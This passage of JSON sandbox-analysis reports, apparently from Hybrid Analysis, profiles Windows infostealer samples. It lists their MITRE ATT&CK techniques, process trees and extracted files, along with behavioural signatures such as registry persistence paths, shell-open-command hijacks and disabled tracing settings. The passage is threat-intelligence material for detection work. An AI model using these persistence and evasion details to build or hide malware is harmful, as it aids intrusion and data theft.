"attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-30", "type": 3, "relevance": 5, "name": "Modifies file/console tracing settings (often used to hide footprints on system)", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "stream-72", "type": 1, "relevance": 3, "name": "Contains ability to capture the screen", "description": "System.Drawing.Graphics::CopyFromScreen(System.Int32,System.Int32,System.Int32,System.Int32,System.Drawing.Size) at a1b5e20b58d23b26f640f252ece0891b-6000002-_~_", "origin": "Hybrid Analysis Technology", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d
https://hybrid-analysis.com/sample/5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d
Hybrid Analysis - Infostealers
{"size": 99537, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d", "sha256": "5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d", "av_detect": 91, "vx_family": "Dump:Generic.Dacic.9C483F5C.A", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 3, "total_signatures": 191, "extracted_files": [{"name": "rundll32.exe", "file_path": "%WINDIR%\\system\\rundll32.exe", "file_size": 90512, "sha256": "a7bc2a787347c4ec67cceefc5cfc208b2dae3a278d0177a0b5c63d620fbf315a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "rundll32.exe (PID: 5204)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_.exe", "file_size": 91887, "sha256": "f529a91904774d03aacc1e22a6dfd034289688c05e979621b4b0695aaf89d173", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "notepad_.exe", "file_size": 87011, "sha256": "eb995873f1c327620686c97658317508607d6c53ace8b2beb4cfa6a2892cacbc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "RUNDLL32.EXE.67A47BFB.bin", "file_size": 90512, "sha256": "a7bc2a787347c4ec67cceefc5cfc208b2dae3a278d0177a0b5c63d620fbf315a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .RES Files linked with CVTRES.EXE 5.00 (Visual Studio 5) (build: 1720)", "17 .CPP Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8168)"], "imported_objects": ["5 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 8168)", "11 .C Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8168)", "2 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)", "12 .OBJ Files (COFF) linked with LINK.EXE 5.12 (Visual Studio 5 SP2) (build: 8034)", "4 .OBJ Files linked with ALIASOBJ.EXE 6.00 (Internal OLDNAMES.LIB Tool) (build: 7291)"], "file_analysis": ["File contains C++ code", "File is the product of a medium codebase (17 files)"], "total_file_compositions_imports": 239}, "processes": [{"uid": "00000000-00000892", "name": "5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe", "normalized_path": "C:\\5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe", "sha256": "5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d"}, {"uid": "00000000-00005204", "parentuid": "00000000-00000892", "name": "rundll32.exe", "normalized_path": "%WINDIR%\\system\\rundll32.exe", "sha256": "a7bc2a787347c4ec67cceefc5cfc208b2dae3a278d0177a0b5c63d620fbf315a"}, {"uid": "00000000-00003908", "name": "WerFault.exe", "normalized_path": "%WINDIR%\\system32\\WerFault.exe", "command_line": "-u -p 5204 -s 192", "sha256": "08bace187a0225e10677de9aa6738a7118be3e5cad6dc45fb8d3366a61bb343c"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 5, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Clear Persistence", "attck_id": "T1070.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Odbcconf", "attck_id": "T1218.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/008", "malicious_identifiers_count": 1, "parent": {"technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 4, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "malicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 6, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"WinExec\" (Indicator: \"WinExec\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"WinExec\" (Indicator: \"WinExec\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"SOFTWARE\\Classes\\MSipy\" in Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\n \"Software\\Classes\\MSipv\" in Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" in Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\n \"Software\\Classes\\txtfile\\shell\\open\\command\" in Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\n \"Software\\Classes\\exefile\\shell\\open\\command\" in Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\n \"SOFTWARE\\TENCENT\\QQ\" in Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\n \"SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\" in Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\n \"SOFTWARE\\GoldenSoft\\Recovery Genius 21st\" in Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\n \"SOFTWARE\\GoldenSoft\\Recovery Genius\" in Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\n \"SOFTWARE\\YuanZhi\\Recovery Genius 21st\" in Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\n \"SOFTWARE\\YuanZhi\\Recovery Genius\" in Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\n \"ISTRY\\USER\\S-1-5-21-2092356043-4041700817-663127204-1001\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\" in Source: 00000000-00000892.00000000.334478.00300000.00000004.mdmp\n 00000000-00000892.00000001.335075.00300000.00000004.mdmp\n \"Software\\Policies\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00005204.00000000.334618.002D0000.00000004.mdmp\n 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\" in Source: 00000000-00005204.00000000.334618.002D0000.00000004.mdmp\n 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\n \"SOFTWARE\\Classes\\MSipy\" in Source: 00000000-00005204.00000000.334618.0040C000.00000080.mdmp\n \"Software\\Classes\\MSipv\" in Source: 00000000-00005204.00000000.334618.0040C000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00005204.00000000.334618.0040C000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" in Source: 00000000-00005204.00000000.334618.0040C000.00000080.mdmp\n \"Software\\Classes\\txtfile\\shell\\open\\command\" in Source: 00000000-00005204.00000000.334618.0040C000.00000080.mdmp\n \"Software\\Classes\\exefile\\shell\\open\\command\" in Source: 00000000-00005204.00000000.334618.0040C000.00000080.mdmp\n \"SOFTWARE\\TENCENT\\QQ\" in Source: 00000000-00005204.00000000.334618.0040C000.00000080.mdmp\n \"SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\" in Source: 